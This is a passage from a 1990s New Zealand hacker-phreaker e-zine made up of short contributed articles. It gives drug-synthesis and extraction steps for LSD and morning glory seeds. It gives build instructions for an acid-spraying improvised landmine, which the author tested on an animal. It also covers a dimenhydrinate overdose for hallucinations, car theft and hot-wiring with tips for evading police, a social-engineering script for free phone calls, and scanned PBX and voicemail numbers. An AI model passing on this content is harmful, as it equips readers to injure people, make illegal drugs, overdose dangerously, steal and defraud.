  acetonitrile is obtained by reacting 5.36 grams of d-lysergic acid 
  and 8.82 grams of trifluoroacetic anhydride.  The mixture must be
  carefully handled so it doesn't pick up water from the air.  Next,
  almost any diethylamine compound is dissolved in more acetonitrile and
  the two solutions are mixed.

  For all of these processes, the vessels must be stoppered with a
  water-absorbing salt such as calcium chloride to keep moisture out.
  However, after the initial mixture has reacted for 3 hours, water is
  deliberately added and it is shaken.  Then, a solvent such as chloroform
  is added.  The chloroform and water layers will separate, with

  nearly all of the LSD being in the chloroform layer.  Pouring the
  LSD/chloroform mixture through a tube full of aluminum oxide will
  separate the two and the LSD will remain in the tube.


  -[ ANOTHER WAY OF MAKING L S D ]-
  
  Items you need:

  1.. About 200-250 grams of MORNING GLORY SEEDS or BAY HAWAIIAN OOD ROSE
      SEEDS. The Morning Glory Seeds can be abtained at most plant nurseries.
  2.. 200 cc. of petroleum ether 
  3.. Small peice of window screen or a strainer. 
  4.. A couple of large glasses. 
  5.. One cookie tray (old one to never be used again).
  6.. 260 cc. of wood alcohol (call your local drug store). 
  7.. Capsule containers (jel) 
  
  What to do:

  1.. Grind up about 170 grams of Morning Glory Seeds.
  2.. In 145 cc of petroleum ether, soak the seeds for two or three days.
  3.. With screen, filter the liquid thru it and save the seed mush and allow
      it to dry completely.
  4.. Let the mush soak in 130 cc. of wood alcohol.
  5.. Filter solution again only.  Save the liquid in a large glass jar.
  6.. Soak the seed mush again in 130 cc. of wood alcohol for two more days.
  7.. Filter out the mush and keep the liquid.  Now, get the liquid that was
      saved in step 5.
  8.. Now, pour both liquids in a cookie tray and let it dry.
  9.. When all the liquid has dried, a yellowish gummy looking substince will
      appear on the cookie sheet.
  10. Take the yellow gum and put these in to capsules.
  
  You can get the capsules just by buying something like DEXITREM or some
  other pill.  Even CONTACT comes in jel capsules.  Just empty them out and
  put the yellow gum in the capsules.  Allow the capsules to sit over night
  for best results.
  
  34 grams of morning glory = one trip to da moon
  18 grams of hawaiian wood = trip to SPACE!


-----------------------------------( 12 )-----------------------------------
                               ACiD LANDMiNE!

----------------------------------by PoSCa----------------------------------

  Yeah this one is a beauty! I tested, by allowing a hedgehog to walk on the
  landmine as it was heading towards the cabbage. The Acid shot upwards
  and permantly burnt the hedgehog's lower body. Couple of days later I
  discovered the hedgehog was dead from shock and that the spikes were
  bleeched blonde! God knows what this device would do to a ordinary human-
  being or to a retard. Enough of the outcomes... Here is what you need if
  you want to become a statistic for the permantly burnt.

  A empty can of Watties Bake Beans
  A circular piece of thick cardboard that is slightly larger than the can
  A 3 inch nail
  A spring
  A piece of glad rap
  1 cup of deionised water
  1 cup of concentrated Ethanoyl Chloride

  Dig the hole where you want to place the landmine and place the can in.
  Now pour the Ethanoyl Chloride in the can and then place the glad rap over
  it and push it down till the glad rap is close to the Ethanoyl Chloride.
  Pour the water on top of the glad rap and place the 'trigger' on top.
  The trigger is the circular piece of cardboard that is slightly larger
  than the can and it has the nail and spring through the middle. Make sure
  the nail is NOT damaging the glad rap else your practically dead!
  What you should have now is this:

                                 _
    ,,,,,,,,,,,,,,,,,,,,,,_______#_______,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                          ||     !     ||
    # -Spring             ||     '     ||   Water
                          |`````````````|
                          |             |  Ethanoyl Chloride
                          |_____________|

  As you can see, the moment the nail penatrates the glad rap, the
  Ethanoyl Chloride will be exposed to the water. The Ethanoyl Chloride
  will react vigorously with water creating Hydro-Chloric gas and
  Ethanoic Acid. This reaction is so strong that reaction force would
  push the acid upwards.

  Camoflage the Landmine with grass clippings. Then it would be perfect for
  the enemy to trip on. Additional chemicals to boost the mines performance
  is 3/4 of concentrated Ammonia with 1/4 water and place this mixture
  instead of 1 cup of water. Also add about 2ml of glacial acetic acid with
  the Ethanoyl Chloride. At this stage you got ya self a miniture fusion
  landmine, so be EXTREMELY CAREFUL.


-----------------------------------( 13 )-----------------------------------
                                TRiPPiN'CHEEP

----------------------------------by oPium----------------------------------

  I remember writing this article in ToT#2 but this time i will tell you
  exactly what brand to get for wick'd hallucunationz..

  (It will only cost you $6.00 nz)
  Just go to the nearest chemist, ask for..


  DRAMAMINE (50mg)


  EACH TABLET CONTAINS:
  DIMENHYDRINATE B.P. 50MG
  CONTROLS TRAVEL SICKNESS
  Caution: This may cause drowsiness.
  If affected, do not drive or operate
  machinery within 8 hours of taking
  this medicine.
  keep out of reach of lamers!


  Last time i told you to get TRAVECAR??? But dramamine is better and it
  does the job!.. Especially when you havent eaten anything before u take em

  These are just perfect for a good trip.. So swallow the whole 10 tabz
  and ya sweet maybe if you like after each tab swallow 1/4 glass of
  water to help it dissolve easier!..

  Sit back.. and !SMaSH! It'll hit ya good and last you almost 9 hours
  so dont fuck with this shit at skool ..aint worth it!

  Hav!Fun


  oP!


-----------------------------------( 14 )-----------------------------------
                            HOW TO RiP OFF CARZ!

----------------------------------by cRomm----------------------------------

Q. How do I break into a Car??

A. Simple there are many ways...
   First and easiest way is keys... Pot luck, Flat head screwdriver,
   rock ( real dumb move ) use your bloody brain...
   most cars have one flaw that being
   that they are easy to get into via a lock.... ( After All what looks
   more natural than using keys to get into a car? )
   another note... if you can unlock the car with keys try the boot you
   might get a surprise... :>

Q. What is the screw driver for???

A. Well it ain't for fixing it is it??? just put it at the top of the
   window and twist like you are screwing in a screw...
   almost silent but effective...

Q. Where do I get keys from?

A.  Simple from flat mates, Car Auctions, Car lots, and in general
    police stations :> and last but not forgotten Cars...
A.1 Flat mates and friends are a good place to start from...
    Borrow the car get the key copied...
A.2 Car Auctions are another great place, after all there are shit loads
    of Cars and keys.. not to mention bikes to...
    always take a spare unless you are really desperate... but don't get
    caught what ever you do... if the keys are not in the ignition look
    in the visor and/or Glove box...
A.3 Car Lots are pretty much the same as Car Auctions....
A.4 Police Stations are real great for looking for keys...
    Just say you lost a set of key about 2-3 weeks ago.. and the copper
    at the bench will usually bring a box or can of keys out for you to
    rifle through... :> make sure you get a set of keys that obviously
    would belong to ya .. namely the ones you described loading...
A.5 Cars... Yes cars... Some cars have a spare key between the front
    plate and the bumper where they are bolted together or screwed on..

Q. What to do with the damned car??

A. Nice and simple convertion if you want a car.. little bit hard since
   they brought in VIN numbers... but not hard... ( will tell ya how in
   the next ToT ) ummm stripping down the car, for spares and or selling
   off... ummm Joy riding, best if you use the bloody car to go places,
   namely at night and prey like hell ya don't get caught... , Use the
   car for illegal stuff.... when you are finished take all that is not
   bolted down.. like Stereo's , Sun roofs etc...

Q. I'm in the bloody car and don;t have any keys now what?

A. Well you really should not be in the fucking thing if you wanna steal
   it, but hey if you are in luck you might find that the car you are in
   has no Steering lock... cool ya think but how to get it going??
   well Hot wire it....

Q. Ok I wanna hot wire a car how do I do that???

A.  Well there are many ways...

A.1 Pocket knife... cut off the negative and positive wire and and the
    Ignition wire... The - & + are the two largest wires usually, cause
    they gotta carry the juice don't they sorta like Sky TV :>
    anyway join the -&+ together and start putting the other wires one
    at a time on the exposed wires... on will start the bloody car,
    one of the others will be the dash lights:>

A.2 Some cars have some sort of clips that just clip on to the Ignition
    lock... Just pull the two largest ones off and join them together
    and use ya brain to Figure out how after all it's not that hard..

A.3 Some lame way by opening the hood and crossing doing some lame
    thing... I my self never learnt how but don't let that stop you
    from learning...


Tip Time...

I..... If you're gonna steal a car look for one that looks like it may
      just be yours...In other words look like you can afford the fucker..

II.... Get a car that has working lights... Nothing worse that a copper
       pulling you over for no break lights... Get the hint??
       The best way to find out is at night time by backing up against a
       wall and putting on the breaks then checking them same for
       indicators

III... Don't get a piece of shit either thats worse than a car that you
       can't afford

IV.... Drive Normally don't be an Egg! or normal for you but how the
       average driver does, This way you have less chance of getting
       caught..

V..... Don't carry all your keys together as this will set you back for
       weeks replacing them...

VI.... Carry a scanner if ya can get one...

VII... Avoid car alarmed cars if possible.. They are more hassle than
       they are worth

VIII.. The Driver takes all the blame for the car if you get caught
       Nothing worse then blaming ya mate ...
       
IX.... If The cops come knocking on your door asking why ya finger prints
       are all over the car like steering wheel and hood area ,say you
       were hitching and the car was having engine trouble so he/she got
       you to help out... like starting engine etc...

X.....  Don't say you got the fucking Idea for stealing cars from a text
        file either cause thats fucking lame and this is for
        informational purposes... and I will deny everything about this
        text file then I will hunt you down and fuck ya older sister
        and get my dog to eat ya cat and tattoo NARK on ya forehead...
        apart from that enjoy...


BTW forks are for fuck wits who want to get caught....
  

-----------------------------------( 15 )-----------------------------------
                                  JAP CRAP

------------------------------by bAD¢lANGUAGE!------------------------------

i got me self a kool 1992 honda CRX a few months ago, and i was out 
cruisin' da streets one day and when i went to unlock the door of the car 
i put the key in the door and it unlocked fine, but when i went to put 
the same key into the ignition the fucken thing wouldn't fit in.  i 
looked at the key and it was the house key, and i was wondering how the 
fuck it opened my door...  anyway i drove home and when i pulled up into
the garage i tried the house key in the car door and it opened the bitch,
so i decided to get another set of keys from my dads ferrari and tried them
in the door and they worked too...

As i was fucken scared that some cunt might try to steal my hot CRX i took
it down to the locksmith to check it out, and he said the problem was that
the atmosphere from japan is different to here in new zealand and after a
while the pins in the lock get stuck in there Opened positon. ie:  when
you put the key into the lock, the key aligns all the pins so you can 
open the door, but when you take the key out the pins stay in that 
position, so thats why i could use any key to open my door.  The lockcock
took off with $79.95, just to fix it, but as i could still manage to
open the door lock with a bit of fiddling, and that olde raking
technique, i went back and beat the shit out of the cunt, and brought 
myself a nice mongoose car alarm.

now this could be an easy way to break into japanese imported cars, i have
tried doing this to other cars with my set of keys and have only found
a small proportion of car doors that will actually open, so if you are
cheap and can't afford a lock set you could give this method a go but
the probablity of success is low, but then again a rock/brick is very
handy and always get the adrenalin pumping if a car alarm goes off too!!!!


-----------------------------------( 16 )-----------------------------------
                               7 LiTTLE POSTiEZ

----------------------------------by StiGZ----------------------------------

  Ed; SORRY! I cant convert the file properly, becoz what happened is
      stiggy wrote the damn thing on his c64 and i have the file on my
      puter, but i still havent managed to find a prog to convert it
      100% into a normal text file.. Im still tryin, sorry dewdz


-----------------------------------( 17 )-----------------------------------
                               CARDPHONE PHUN

----------------------------------by ][yPe----------------------------------

  This is for NZ freaks.. I doubt this would work in other country's but
  if you want to try it.. go ahead

  If you're desperate to make a local call and you dont have a phonecard
  or your friend (or whoever you are callin) doesnt except collect callz
  this information below is for you!

  * = YOU
  O = OPERATOR

  Ring 010 [National Operator Service]

  * "Hi, there is something wrong with the phonecard machine and it's not
     operating properly"

  O "What is the problem there?"

  * "Whenever i try to put my card in, it keeps pushing it out"

  O "Ahh, i see, okay try putting the card in now"

  NOW PUT THE CARD IN HALFWAY AND PULL IT OUT AND PUT IT IN AND THEN OUT..
  SO IT CLICKS A FEW TIMES

  * "Sorry it's not going through, i think its jammed up, could i make
     a quick call please"

  O "Yes ok, how much credit is left on your card?"

  * "3 dollars 80"

  O "What's the number on your card"

  THEY MEAN THE NUMBER AT THE BACK OF THE CARD WHICH IS AT THE TOP!

  * "Ok it's 312BO040339"

  O "And the number you are calling?"

  * "4718184"

  O "Ok, thankyou"


  Piss easy aye dewdz.. Ok, dont abuse this too much, otherwise they
  will start gettin suspicious bout whatz goin on!


-----------------------------------( 18 )-----------------------------------
                              VMB/PBX/BBS #'Z!

---------------------------------by GreyRat---------------------------------

hi folks! im back with another nice article
written by me the ole'famous GreyRat =]
I havent been doing much in the hapcv scene
because i have been much rather busy at work,
but lets get on with the scrap.. The numbers
are mostly scanned and i thank the following
for helping me to complete this list

Op!um, Hype, Tim, D-m, sycokid
and ofcourse telecom NEW ZEALAND =]

--- NUMBER'S F0UND IN WELLINGTON ---

802-6039 ???
801-3090 CONNECT
801-3333 VMS
382-06XX DIVERTER 0900
382-229X DIVERTER 0900
237-1000 ???
388-5050 PBX?
232-0005 VMB
232-0006 VMB
232-0007 VMB
232-0008 VMB
232-0009 VMB
232-0010 VMB
527-6330 PBX
568-4040 PBX
382-0171 CONNECT
382-0172 PBX
382-0173 CONNECT
385-6662 VMB
528-2772 CONNECT?
576-5998 DIALUP
237-9155 CONNECT?
576-5765 PBX
499-3005 VMB
499-3006 VMB
499-3007 VMB
499-3008 VMB
499-3009 VMB
576-5692 PBX?
576-5825 PBX?
801-4263 PBX
472-3550 ???
495-0700 ???

--- NUMBER'S F0UND IN AUCKLAND ---

358-1107 CONNECT
358-1368 CONNECT
358-1374 CONNECT
358-1410 PBX
358-1537 CONNECT
356-3984 DIALUP
356-1448 PBX
256-1296 PBX?
256-1297 PBX?
256-3811 PBX
262-8888 VMB
377-0720 CONNECT
302-0703 PBX?
358-7400 VMB
358-74XX DIVERTER 0900
302-96XX DIVERTER 0900
302-8598 PBX?

--- NUMBER'S F0UND IN CHRISTCHURCH ---

379-8364 ???
372-8954 DIALUP
359-7451 CONNECT

Thats it.. please mail me if you have any #'s i have missed on this
listing.. bye, c-ya in tot#6 !!!


-----------------------------------( 19 )-----------------------------------
                                  GREET'Z!

----------------------------------by ][yPe----------------------------------

  !BiG! hELLOZ to the folowin.. [no special order]

  Chotaire - Hey man, your web site is looking good.. very colourful too!
  Xalas - to dodiako!!! - Did i say it right???
  eViLiVe - _\|/_ GaNJa RuLZ!!! _\|/_
  DaXX - YO!!! if you cant call VP anymore send me some mail ok!
  Scavenger - without you we wouldnt have the best boxing prog! :)
  oPium - "fuck u im fed with u im not as good as u fuck u im better than u"
  GreyRat - Mega tHANX! for the nice article.. hope to see more soon!~ 
  RaDiX - I like your bbs coz it's really secured!
  kRy0 - Yo! i gotcha disks.. im sending them ASAP!.. fuck'n xpensive! :)
  Cru-l-t - I wunder how much TAR you've build up :) ehehe
  RESIST0R - UAF is k00l, keep it up!
  SKORPiO - h3y fix the bug up in dESiRE.. ok l8r
  DarkCyde - Greetz dewd
  NoSTRoMo - h3y! ring me, we havent spoken in ages,.. still got the ami?
  SNoWMaN - yO!~bRO!~ hOWZ iT? You hack'd the atm machine yet!?
  GoZZ - Many thanx for the K3WL Trickz of the Trade ascii you done for us!
  DemonPhreaker - I had a look at your zine's.. fuck1n pr1mo :)
  CHEMiCAL - Hiya Chemyyyy!!! what happened to your mail addie? changed?
  DiGiT0NE - DiGiiiii, yo man, howz it.. did you have a great holiday?
  MrMilk - YoYo Aussie phreak! :) hawaii rulzzz
  cRomm - Thanx for the article mate! Umm, when is that bbs gonna go back up?
  Neophyte - Greetz BB phreak :) Howz thingz.. ceyaaa round
  IceMan - Hey could ya do me some articlez for ToT#o6
  StiGZ - heeey! i got your article but i cant get it converted yet! :((
  Omega - aD rULZ!!! worldz best dont ya reckon?!
  mann1 - yo man, thanx for callin my bbs! eheh, do you have any requests?
  XanTH - Thanx for the ticketz man!
  Accident - i supose your in America by now.. 
  ACiD KiD - SM was a good bbs.. I will never forget those dayz 
  GrassHopper - hey chris.. howz the sounz goin? startd up a band yet?
  Energizer - Heya, i havent seen you for fuckin ages
  MutantX - did you got busted for cc fraud? fuck i hope not dewd
  Darkman - h3y fr3ak!@> gimme some cardz!!!!!! J.K
  Nick - Greetz!
  Kevin - Hey you Black Magic freak!
  Quetzal - Greetz!
  Earwax - fucken asshole gimme that clicker
  bLaDe - I must admit you did a great job on the fake-id cardz!!!
  DrDr3 - Greetz!
  Overdose - Have you crashed into any more tree'z l8ly? ahaha
  Van Hauser - THC rulz! Im lookin forward to some amiga progz tho :)
  BaDS - emm, fuck where have you been man? have you changed your handle?
  EXtreme - Greetz!
  Kool kat - Greetz!
  8ball - gi'day m8!
  SaNDMaN - Have you still got your amiga1200 ???
  CRaZY - Craaaaaaazy! howz it dewd.. catchya somtim on #BlueBox l8z4now!
  Debbie - Greetz!
  Penguin - yO! I like the hack/phreak section.. it's looking g00d!!!
  Kurupt - nEXT TIME your in wgtn!.. come for a fucking visit!
  R-a-d  - Greetz!
  Cyntax - Greetz!
  Ryloth - Greetz!
  abrupt - yo african! we need to chat soon!! so get ur ass on #BlueBox
  Raiden - i tried calling your bbs a few months back, no answer?
  CaNaaN - "collect call from wgtn, do you accept the charges?" ehheeh!ahah
  d-MoUSe - yo sorry to scream at ya on the k0nf, i was stressing out bad!y
  MiCro - Hey welcome to the gang :) do some more kewl text soon pleez!
  HiTraject - Greetz! long-tyme-no-see
  ZaP! - Greetz!You running a bbs now? thatz what i heard
  Ceo - yOyO, howz HiROSHiMA goin? - hey gimme a call somtime..
  lucifer07 - you used to ring me quite often, and now you stopped.. bustd??
  aDEPT - hEY! fUCK! longtymenosee! get back on iRC okay..
  smut - Greetz!
  qwik - Greetz!
  Dansken - Greetz!
  The Hegg - Greetz!
  xxer - Greetz!
  bAD lANGUAGE - aaaYE what you think of this issue? :)

  If i missed any1 out.. i APOLOGIZE SINCERELY!
  ^ok spotcha'l8er


-----------------------------------( 20 )-----------------------------------
                                LAST WORD'Z!

----------------------------------by ][yPe----------------------------------

  YeAAH! bout tyme i released this mutha fucka hah!.. .
  I know it's not very big, but h3y, this tyme we bring you info and
  hp education to get you rolling in the phreaking zone!!! Next Issue
  hopefully be nice and big with fun and longer articles to read!..

  I would like to thank Gozz for the tot logo at the beginin of this zine!
  and thanx to BaD L for the kewl raytrace PHREAKIN THE SHEEP :)

  ..

  Next issue i will have some o.s writer's in the mag again, t0t#5
  wasnt prepared and organized well and i didnt get tyme to contact
  the o.s writerz, but now that i have a net-account i'll be getting
  it all sorted out for t0t #6.. so l00k out for it dewdz!

  ..

  Guess whot, i dont have an AMIGA anymore, i decided to sell it and
  i brought myself a p133 with fuckin heapz of hd space and heapz of
  ram etc etc, Fuck its been a while since you dewd's have read a new
  707 zine! Sorry aye, many reasons ..mainly gettin hold of the t0t
  memberz wasnt very easy, we had ran out of idea's.. well i had heapz
  of thingz to write bout, but the other phreakz were flat on articlez
  But it's good to see at the end many memberz contributed and a few
  new dewdz Cromm and Micro helped out too! Thanx guyz

  ..

  h3y! We are still looking for MORE memberz, so if you are a coder
  graphix artist, writer, phreakr, hacker, anarchist, drug scientist
  etc etc we wanna hear from you!.. CONTACT me via internet

  qWid  #BlueBox  #Phreak  #GaNJa  #KoRn  #HaCk #ToT

  If there is fuck all people in #BlueBox try this server
  irc.funet.fi or irc.stealth.net

  ..

  At the moment i am really interested in gettin this magazine into
  a coded format.. I might get BaD L to do the amiga version, if we
  agree to do it this way.. but tyme will tell

  ..

  Pleez dont give our ZiNE to lamerz and newbies.. the information
  contained in each issue is mainly very iLLEGAL...thatz why the
  disclaimer is there, so we dont get no shit from the copz!
  So pleez just read and if you really wanna risk it then try the
  power contained in this issue thatz no problem but be very careful
  and dont get caught! okay?

  ..

  VIL MPIRE - 100% h/P/a/C/v/D
  ~~~~~~~~~~~   sYSOPZ=][yPe/PoSCa
                RuNNinG oN P133, SyS/X
                OFFLINE, LiMiT=40 users

  So you ask when the fuck can i call this evil empire?? well thatz up
  to me isnt it, I gotta get the 2nd lyne, once i can afford it i will
  be making a few callz to friend'z (memberz/non memberz) and telling
  them the NUP and #.. at the mo the passwd is SYNDICATE
  but i might change it, so dont think its gonna stay like that forever!

  ..

  Fuckwitz - i have had some lame dickhedz ringing me up from Auckland
  and christchurch and some from town..

  herez a conversation i had with som weird phuck..

sm "YO IS THIS HYPE?"

me "WHO?"

sm "HYPE?"

me "NO WRONG NUMBER"

sm "IS THIS XXXXXXX?"

me "YEAH SO"

sm "WHO'S THIS"

me "NONE OF YOUR FUCKING BUSINESS!"

sm "[LAUGH] BULLSHIT YOUR HYPE AYE?"

me "YEAH, WHO THE FUCK ARE YOU"

sm "XXXX-XXX FROM AK"

me "WHO GAVE YOU THIS #"

sm "WHY???"

me "FUCK YOU! DONT RING ME BACK TILL YOU TELL ME WHO GAVE YOU THIS #"

NO CARRIER

  The dork rang me the next day and told me who told him the # and after
  we chatted a bit he started going "GOT ANY GLOBALZ MAN" i said "FUCK
  OFF I DONT SPREAD GLOBALZ TO FUCKWITZ I DONT KNOW" and he got shitty
  and hung up and never rang again!!! ehehe

  msg to SM
  ~~~~~~~~~
  NEXT TIME you call me dont act lame and ask for #'s.. I dont give
  thingz out to people i dont know,,. Put it this way I.D.T.A.1

  ..

  oKAY! we are coming to 'nother dead-end now,, So, pleez look after
  ya self, dont kill ya self, dont make a bomb and throw it at your
  neighbours catz :) and dont fuckin ring me collect, otherwise
  "IM GONNA GET ME-EVIL ON YOUR ASS" - Pulp Fiction

  aND lOOK oUT fOR t0t#o6 .. aNOTHER fINE zINE bY tHE tRICKZ oF tHE
  tRADE cREW!,, CeeeeeYaaaaa freak!












  Only A Wise Guy Talkz Real Fast.... 
       Only A Hacker Can Fuck Your System... 
            Only A Phreaker Can Piss Off Telecom..
                 Only A Anarchist Can Blast Your Place..
                      Only A Cell Phreak Can Ring The World..
                           Only A Drug Scientist Can Make You High.
                                Only A Fool Narqs On His Matez!!!!!!!!..
                                     Only A Smart Guy Gets Away!!!!!!!!!!!!.

                                                                  - ][yPe 96
                               











                .______________. __________ ._______________.
          . . .:|              |/          \|               |:. . .
            . .:|  ][yPe PoSCa '  eX-treme  ` Iceman Micro  |:. .
               :|___  BaD L     KpT      kev     Ph0DEr ____|:
                ```|  oPium  .  Ceo     nick  .  DemoG  |''''
                   |  cRomm  |\   Grey-Rat   /|  StiGZ  |
                   |_________| \____________/ |_________|
                   '''''''''''  ''''''''''''  '''''''''''




























_ _   _ _   _ _   _ _   _ _   _ _   _ _   _ _   _ _   _ _   _ _   _ _   _ _
|o| - |o| - |o| - |o| - |o| - |o| - |o| - |o| - |o| - |o| - |o| - |o| - |o| -
